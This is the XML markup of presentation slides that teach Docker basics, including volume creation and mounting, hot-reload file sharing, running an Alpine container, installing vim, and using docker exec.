              <a:t>entryfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="CD5555"/>
                </a:solidFill>
              </a:rPr>
              <a:t> you </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="CD5555"/>
                </a:solidFill>
              </a:rPr>
              <a:t>can't</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="CD5555"/>
                </a:solidFill>
              </a:rPr>
              <a:t> start the OS</a:t>
            </a:r>
            <a:endParaRPr sz="3650">
              <a:highlight>
                <a:schemeClr val="lt1"/>
              </a:highlight>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256"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="260675" y="734850"/>
            <a:ext cx="8520600" cy="380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3220">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="3220">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="3220">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="3220">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="3220">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="3220">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFil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p257"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="408975" y="215600"/>
            <a:ext cx="8520600" cy="1058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100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>How to mount a directory from inside the running container to the host volume location?</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:highlight>
                <a:schemeClr val="lt1"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1597" name="Google Shape;1597;p257"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="854325" y="3252100"/>
            <a:ext cx="76299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500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:highlight>
                <a:schemeClr val="lt1"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1598" name="Google Shape;1598;p257"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="372075" y="1571100"/>
            <a:ext cx="8594400" cy="33888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6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ocker create volume anilvolume</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ocker volume ls</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ocker volume inspect anilvolume</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/var/lib/docker/volumes/anilvolume/_data</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ocker run -d -v &lt;volume&gt;:/container_mount_directory myimage:tag</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ocker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> run -d -v anilvolume:/opt/src jade_asterisk:v1</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>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58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="423950" y="473800"/>
            <a:ext cx="8520600" cy="24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5520">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
              </a:rPr>
              <a:t>Volume Mounting with Hot Reloading</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="5520">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:highlight>
                <a:schemeClr val="lt1"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="5520">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
              </a:rPr>
              <a:t>File Mirroring</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="5520">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:highlight>
                <a:schemeClr val="lt1"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1604" name="Google Shape;1604;p258"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="854325" y="3252100"/>
            <a:ext cx="7629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500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
              </a:rPr>
              <a:t>HostOs (change) -&gt;ContainerOs</a:t>
            </a:r>
            <a:endParaRPr sz="3500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:highlight>
                <a:schemeClr val="lt1"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
              </a:rPr>
              <a:t>Sharing FileSystem with container</a:t>
            </a:r>
            <a:endParaRPr sz="3500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:highlight>
                <a:schemeClr val="lt1"/>
              </a:highlight>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59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="247575" y="836625"/>
            <a:ext cx="8793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highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk2"/>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700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>docker run -itd -v h_wd:c_wd –name &lt;contName&gt; &lt;imageName:TagName&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk2"/>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700">
              <a:solidFill>
                <a:schemeClr val="dk2"/>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700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Examplenext1_image</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk2"/>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en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>docker run -itd -p 3000:3000 -v .:/home/next1 --name nextcon2 next1_image:t1</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:highlight>
                <a:schemeClr val="lt1"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>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260"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="5797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891"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3018">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>There are 2 ways</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3018">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1615" name="Google Shape;1615;p260"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="250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2600">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-393700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="2600"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Using Command line</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-393700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="2600"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Using Docker compose file</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>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2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990"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3305">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Note</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3620">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1621" name="Google Shape;1621;p2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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2350">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>You can't mount a VOLUME in a Dockerfile specifying both source (host) and destination (container) paths.</a:t>
            </a:r>
            <a:endParaRPr sz="2350">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2350">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>This is because this idea does not fit the basic concept that Docker image is portable and independent of host.</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFil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pic>
        <p:nvPicPr>
          <p:cNvPr id="1626" name="Google Shape;1626;p262"/>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chemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Linux Alpine Image</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2720">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1632" name="Google Shape;1632;p2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Linux alpine a  very light weight image of just ~7 MB.</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Linux Ubuntu is a size of ~77MB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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="249" name="Google Shape;249;p48"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="5143500"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="9144000" cy="5143500"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="250" name="Google Shape;250;p48"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="9144000" cy="5143500"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="DEDFD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1" name="Google Shape;251;p48"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId3">
              <a:alphaModFix/>
            </a:blip>
            <a:srcRect b="8452" l="0" r="11449" t="4583"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="667088" y="99400"/>
              <a:ext cx="7374874" cy="4944702"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:gr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2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chemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Create </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2720">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Linux Alpine Running Container</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2720">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1638" name="Google Shape;1638;p264"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2031800"/>
            <a:ext cx="8520600" cy="1291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3400">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker run -it alpine:latest /bin/sh </a:t>
            </a:r>
            <a:endParaRPr sz="3400">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>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2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chemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to install VIM editor inside alpine container</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2720">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1644" name="Google Shape;1644;p265"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2031800"/>
            <a:ext cx="8520600" cy="1291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4000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>apk add </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vim</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4000">
              <a:solidFill>
                <a:srgbClr val="38761D"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="1649" name="Google Shape;1649;p266"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="397850" y="152400"/>
            <a:ext cx="8223785" cy="4838702"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1650" name="Google Shape;1650;p266"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="290250" y="143000"/>
            <a:ext cx="23904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Linux Alpine OS ~7MB</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267"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="445025"/>
            <a:ext cx="8520600" cy="12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720">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to run command from a </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2720">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>host machine</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2720">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> inside a running container</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2720">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="2720">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1656" name="Google Shape;1656;p267"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1893075"/>
            <a:ext cx="8520600" cy="267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docker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>exec        Execute a command in a running container</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
